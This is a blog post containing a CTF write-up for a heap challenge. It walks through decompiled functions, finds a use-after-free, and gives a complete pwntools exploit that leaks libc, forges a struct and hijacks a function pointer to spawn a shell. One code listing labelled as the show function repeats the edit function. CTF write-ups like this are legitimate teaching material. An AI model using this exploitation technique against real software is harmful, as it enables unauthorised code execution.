425考核wp - 超级玉米人的博客

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

超级玉米人

公告

欢迎来到我的博客！这里将分享我的日常与技术学习笔记。~(∠・ω< )⌒★

Learn More

标签

212 字

1 分钟

425考核wp

2026-04-25

ctf

ctfwp

/

heap

分析#

1
~#@❯ checksec ./chall2
2
[*] '/home/yoyo/yoyo_dir/MyProject/aboutPwn/work2/chall2/chall2'
3
    Arch:       amd64-64-little
4
    RELRO:      Full RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        PIE enabled
8
    SHSTK:      Enabled
9
    IBT:        Enabled
10
    Stripped:   No

将文件拖入 ida 发现如下重要函数

分配 chunk1

1
void register_evidence()
2
{
3
  unsigned __int64 size; // [rsp+8h] [rbp-18h]
4
  void **s; // [rsp+10h] [rbp-10h]
5
  unsigned int n8; // [rsp+1Ch] [rbp-4h]
6

7
  n8 = choose_slot();
8
  if ( n8 < 8 )
9
  {
10
    if ( db[n8] )
11
    {
12
      puts("slot already occupied");
13
    }
14
    else
15
    {
16
      s = (void **)malloc(0x38u);
17
      if ( !s )
18
        exit(1);
19
      memset(s, 0, 0x38u);
20
      puts("Evidence ID:");
21
      read_line(s, 32);
22
      puts("Description size:");
23
      size = read_size();
24
      if ( size && size <= 0x100 )
25
      {
26
        s[4] = malloc(size);
27
        if ( !s[4] )
28
          exit(1);
29
        memset(s[4], 0, size);
30
        s[5] = (void *)size;
31
        s[6] = default_report;
32
        puts("Description:");
33
        read_line(s[4], s[5]);
34
        db[n8] = s;
35
        puts("recorded");
36
      }
37
      else
38
      {
39
        puts("invalid size");
40
        free(s);
41
      }
42
    }
43
  }
44
  else
45
  {
46
    puts("invalid index");
47
  }
48
}

这里可以发现这里可以分配一个db结构体，通过分析发现结构体的结构如下

1
struct db
2
    char  [0x20] EvidenceID
3
    (char*)  [8] des
4
    size     [8] des_size
5
    (void*)()[8] handler = defualt_report

其中 des 是一个可以自定义大小范围为0x1 ~ 0x100大小的chunk

free

1
int destroy_evidence()
2
{
3
  unsigned int n8; // [rsp+Ch] [rbp-4h]
4

5
  n8 = choose_slot();
6
  if ( n8 >= 8 || !db[n8] )
7
    return puts("not found");
8
  free(*(void **)(db[n8] + 32LL));
9
  free((void *)db[n8]);
10
  return puts("destroyed");
11
}

这里是释放函数，但是在释放没有置0结构体,所以存在uaf, 同时结合前面的申请函数，可以知道我们最多可以通过register_evidence 申请8次 chunk

分配chunk2

1
int import_template()
2
{
3
  char buf; // [rsp+Fh] [rbp-1h] BYREF
4

5
  puts("Template size:");
6
  template_size = read_size();
7
  if ( !template_size || template_size > 0x80 )
8
    return puts("invalid size");
9
  if ( template_buf )
10
  {
11
    free(template_buf);
12
    template_buf = 0;
13
  }
14
  template_buf = malloc(template_size);
15
  if ( !template_buf )
16
    exit(1);
17
  puts("Template bytes:");
18
  read_exact(template_buf, template_size);
19
  if ( read(0, &buf, 1u) <= 0 )
20
    exit(0);
21
  return puts("template imported");
22
}

这里可以看到又是一个分配chunk的函数但是每次分配后会置 0, 但是可以重新分配

执行 handler

1
int generate_report()
2
{
3
  unsigned int n8; // [rsp+Ch] [rbp-4h]
4

5
  n8 = choose_slot();
6
  if ( n8 < 8 && db[n8] )
7
    return (*(__int64 (__fastcall **)(_QWORD))(db[n8] + 48LL))(db[n8]);
8
  else
9
    return puts("not found");
10
}

修改 des

1
int edit_evidence()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-10h]
4
  unsigned int n8; // [rsp+Ch] [rbp-4h]
5

6
  n8 = choose_slot();
7
  if ( n8 >= 8 || !db[n8] )
8
    return puts("not found");
9
  v1 = db[n8];
10
  puts("New description:");
11
  read_line(*(_QWORD *)(v1 + 32), *(_QWORD *)(v1 + 40));
12
  return puts("updated");
13
}

展示 des chunk

1
int edit_evidence()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-10h]
4
  unsigned int n8; // [rsp+Ch] [rbp-4h]
5

6
  n8 = choose_slot();
7
  if ( n8 >= 8 || !db[n8] )
8
    return puts("not found");
9
  v1 = db[n8];
10
  puts("New description:");
11
  read_line(*(_QWORD *)(v1 + 32), *(_QWORD *)(v1 + 40));
12
  return puts("updated");
13
}

由于这个题目的libc 版本是 2.34 存在 tceche 所以需要绕过

所以得出如下利用思路

1
1. 填满 tceche
2
2. 泄露出 libc 地址
3
3. 伪造db结构体劫持 handler函数

exp#

于是可以得出如下exp

1
from pwn import *
2

3
file = "./chall2_patched"
4
host = "127.0.0.1"
5
port = 1234
6
libcf = "./libc.so.6"
7

8
is_remote = False
9

10
context.log_level = "debug"
11
context.binary = file
12

13
if is_remote:
14
    p = remote(host, port)
15
else:
16
    p = process(file)
17

18
elf = ELF(file)
19
rop = ROP(elf)
20
libc = ELF(libcf)
21

22
def menu(index: int):
23
    global p
24
    p.recvuntil(b">\n")
25

26
    p.sendline(str(index).encode())
27

28
def choose_slot(index: int):
29
    global p
30

31
    p.recvuntil(b"Index:")
32
    p.sendline(str(index).encode())
33

34
def register_evidence(index: int, eid: bytes, size: int, des: bytes):
35
    global p
36

37
    menu(1)
38
    choose_slot(index)
39

40
    p.recvuntil(b"Evidence ID:\n")
41
    p.sendline(eid)
42

43
    p.recvuntil(b"Description size:")
44
    p.sendline(str(size).encode())
45

46
    p.recvuntil(b"Description:")
47
    p.sendline(des)
48

49
def show_evidence(index: int):
50
    global p
51

52
    menu(2)
53
    choose_slot(index)
54

55
def edit_evidence(index: int, des: bytes):
56
    global p
57
    menu(3)
58

59
    choose_slot(index)
60
    p.recvuntil(b"New description:\n")
61
    p.sendline(des)
62

63
def destroy_evidence(index: int): # free
64
    global p
65
    menu(4)
66
    choose_slot(index)
67

68
def generate_report(index: int): # run
69
    global p
70
    menu(5)
71
    choose_slot(index)
72

73
def export_description(index: int):
74
    global p
75
    menu(6)
76
    choose_slot(index)
77

78
def import_template(size: int, buf: bytes):
79
    global p
80
    menu(7)
81

82
    p.recvuntil(b"Template size:\n")
83
    p.sendline(str(size).encode())
84

85
    p.recvuntil(b"Template bytes:\n")
86
    p.sendline(buf)
87

88
    log.info(f"================")
89

90
"""
91
struct db: id ->
92
    EvidenceID: 0 (0x20 32)
93
    des:  0x20 32 (8)
94
    size: 0x28 (8)
95
    handler = defualt_report
96
"""
97

98

99
for i in range(7):
100
    register_evidence(i, b"", 0x80, b"")
101

102
import_template(0x80, cyclic(0x81))
103
import_template(0x20, cyclic(0x81))
104

105
for i in range(7):
106
    destroy_evidence(i)
107

108
show_evidence(6)
109

110
p.recvuntil(b"Description: ")
111
leak_addr = p.recvuntil(b"\n").strip()
112
leak_db_chunk = u64(leak_addr.ljust(8, b"\x00"))
113

114
p.recvuntil(b"Report handler: ")
115
leak_addr = int(p.recvuntil(b"\n").strip(), 16)
116
pie_offset = 0x1486
117
libc_offset = 0x218cc0
118
elf_base = leak_addr - pie_offset
119
libc.address = leak_db_chunk - libc_offset
120

121
system_addr = libc.sym["system"]
122

123
# create fake db struct: 0x38
124
fake_db = flat(
125
    {
126
        0x0: b"/bin/sh\x00",    # eid
127
        0x20: p64(next(libc.search(b"/bin/sh\x00"))),  # des some str
128
        0x28: p64(0x100),                              # size
129
        0x30: p64(system_addr)
130
    },
131
    filler = b"\x00",
132
    length = 0x38
133
)
134

135
log.success(f"elf_base: {hex(elf_base)}")
136
log.success(f"leak_db_addr_0(Evdence ID 0): {hex(leak_db_chunk)}")
137
log.success(f"libc base: {hex(libc.address)}")
138
log.success(f"system: {hex(system_addr)}")
139

140
register_evidence(7, b"/bin/sh\x00", 0xff, b"")
141
destroy_evidence(7)
142

143
import_template(0x38, fake_db + b"aaaa")
144
generate_report(7)
145

146
p.interactive()